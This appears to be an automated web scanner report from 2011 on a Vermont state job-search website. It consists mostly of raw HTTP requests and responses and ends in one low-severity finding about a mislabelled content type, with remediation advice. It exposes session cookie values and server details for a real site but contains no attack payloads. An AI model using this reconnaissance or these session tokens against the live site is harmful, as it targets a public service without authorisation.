PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/works/linkview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/css
The response states that it contains CSS. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /ada/global/style/cfmstyle.css HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:12:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT
Content-Type: text/css
We're sorry, but a fatal error has occurred (no client variables).
Report generated by XSS.CX at Fri Apr 29 17:05:11 CDT 2011.